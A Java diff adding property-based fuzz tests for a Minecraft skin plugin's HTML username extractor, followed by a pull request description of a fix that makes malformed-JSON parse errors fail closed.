+import net.jqwik.api.Property;
+import net.jqwik.api.Provide;
+
+import java.lang.reflect.Method;
+import java.util.List;
+
+import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+/**
+ * Fuzz corpus for {@link RandomMojangSkin#extractUsernames}, the HTML
+ * scraper behind the random-skin feature (AI-generated code surface, cf.
+ * Pearce et al., S&P 2022). The parser is private, so properties drive it
+ * via reflection, mirroring {@link RandomMojangSkinTest}.
+ * <p>
+ * Contracts asserted here:
+ * <ul>
+ *   <li>malformed HTML (garbage, truncated markers, unclosed spans)
+ *       extracts nothing and never throws;</li>
+ *   <li>oversized documents (many spans, multi-KB usernames, MBs of noise)
+ *       never throw and only yield sane, verbatim usernames;</li>
+ *   <li>path-traversal payloads inside span content come out byte-identical
+ *       — nothing is decoded, unescaped or resolved to a file path (the
+ *       parser is pure string slicing and must stay that way).</li>
+ * </ul>
+ */
+class RandomMojangSkinFuzzTest {
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> malformedHtml() {
+        return MalformedJsonCorpus.malformedHtml();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> oversizedHtml() {
+        return MalformedJsonCorpus.oversizedHtml();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> traversalHtml() {
+        return MalformedJsonCorpus.traversalHtml();
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  E1: malformed HTML extracts nothing                                */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Malformed HTML — random garbage, truncated span markers, a single
+     * never-closed span — must yield an empty list and never throw. The
+     * corpus is built so no input contains two complete openers, which is
+     * the only shape the naive parser can extract a name from.
+     */
+    @Property(tries = 100)
+    @Label("E1: malformed HTML extracts no usernames and never throws")
+    void extractUsernames_malformedHtml_returnsEmpty(@ForAll @From("malformedHtml") String html) {
+        List<String> usernames = assertDoesNotThrow(() -> invokeExtractUsernames(html));
+        assertTrue(usernames.isEmpty(), () -> "malformed HTML yielded usernames: " + usernames);
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  E2: oversized documents never throw                                */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Oversized documents — thousands of spans, a 1-64 KB username, up to
+     * 1 MB of noise, hundreds of dangling openers — must never throw and
+     * must only yield sane usernames: non-empty, free of {@code <} and
+     * control characters, each a verbatim substring of the input, and
+     * bounded in count.
+     */
+    @Property(tries = 40)
+    @Label("E2: oversized HTML never throws and yields only sane verbatim usernames")
+    void extractUsernames_oversizedDocument_noThrow(@ForAll @From("oversizedHtml") String html) {
+        List<String> usernames = assertDoesNotThrow(() -> invokeExtractUsernames(html));
+
+        assertTrue(usernames.size() <= 20000,
+                () -> "implausible username count " + usernames.size() + " for " + html.length() + " chars");
+        for (String username : usernames) {
+            assertTrue(!username.isEmpty(), "extractor returned an empty username");
+            assertTrue(username.indexOf('<') == -1,
+                    () -> "username contains '<': " + excerpt(username));
+            assertTrue(html.indexOf(username) != -1,
+                    () -> "username is not a verbatim substring of the input: " + excerpt(username));
+            for (int i = 0; i < username.length(); i++) {
+                char c = username.charAt(i);
+                assertTrue(c >= 0x20 && c != 0x7F,
+                        () -> "username contains control character 0x" + Integer.toHexString(c));
+            }
+        }
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  E3: traversal payloads stay verbatim                               */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Path-traversal payloads inside span content must come out byte-
+     * identical: the extractor never decodes ({@code %2F} stays
+     * {@code %2F}), never unescapes, never resolves the payload to a file
+     * path, and never throws. Every extracted username must be a verbatim
+     * substring of the served document.
+     */
+    @Property(tries = 50)
+    @Label("E3: path-traversal payloads extract verbatim, with no access outside the prefix")
+    void extractUsernames_pathTraversal_noAccessOutsidePrefix(@ForAll @From("traversalHtml") String html) {
+        List<String> usernames = assertDoesNotThrow(() -> invokeExtractUsernames(html));
+
+        assertEquals(2, usernames.size(),
+                () -> "traversal document must yield exactly its two embedded payloads: " + usernames);
+        for (String username : usernames) {
+            assertTrue(!username.isEmpty());
+            assertTrue(html.indexOf(username) != -1,
+                    () -> "traversal payload was decoded or transformed: " + excerpt(username));
+        }
+    }
+
+    /* ================================================================== */
+    /*  Reflection helper (extractUsernames is private)                    */
+    /* ================================================================== */
+
+    @SuppressWarnings("unchecked")
+    private static List<String> invokeExtractUsernames(String html) throws Exception {
+        Method m = RandomMojangSkin.class.getDeclaredMethod("extractUsernames", String.class);
+        m.setAccessible(true);
+        return (List<String>) m.invoke(null, html);
+    }
+
+    private static String excerpt(String s) {
+        if (s.length() <= 96) {
+            return s;
+        }
+        return s.substring(0, 96) + "…(" + s.length() + " chars)";
+    }
+}


### PR DESCRIPTION
## Round 9 — Item 2 retry: production fail-open gap (AI-parser fuzz corpus)

Mirror of #239 for mc1.12.2.

Fixes the fail-open escape discovered by the fuzz corpus: Gson's strict `fromJson` throws raw `NumberFormatException` on truncated `\uXXXX` escapes (e.g. `{"k":"\u12"}`) and raw `IllegalStateException` on valid non-object roots; neither is a `JsonSyntaxException`, so both escaped `HttpResponse.getBodyAs` out of the Mojang/MineSkin parse paths.

### Production fix
- `MojangApiHttpImpl` — the `fetchJson` choke point now goes through `parseBodyOrNull`, which catches `JsonParseException | NumberFormatException | IllegalStateException` plus a `RuntimeException` catch-all, logs a warning, and fails closed with `null`.
- `MineSkinApiHttpImpl` — same wrapper on the V1/rate-limit `getBodyAs` sites; the V2 `v2SkinObject` and `v2RateLimitWaitMs` `JsonUtils.parseJson` paths now also catch NFE/ISE (+ catch-all) and fail closed (`null` / `0`).
- `JsonUtils.parseJson` — normalizes Gson internal NFE/ISE into `JsonParseException` (required for the unfiltered corpus to stay green in `JsonUtilsFuzzTest` D1).

### Fuzz corpus
- New properties: `parseMojangUuidResponse_truncatedEscape_returnsEmpty` (B5), `parseMineSkinResponse_v2_nonObjectRoot_returnsEmpty` (C5), `parseMineSkinRateLimit_nonObjectRoot_returnsZero` (C6) — each would have failed before this fix.
- `MalformedJsonCorpus` — removed the `parsesToObjectOrMalformed` safety filter that excluded truncated escapes and non-object roots; the corpus now exercises those shapes directly and every corpus property stays green.

### Verification
- `./gradlew build test` — BUILD SUCCESSFUL, 0 failures/errors/skips (fuzz suites: Mojang 5/5, MineSkin 6/6, JsonUtils 3/3).
- aislop 100/100 on every commit; pre-commit hook ran on every commit (no --no-verify).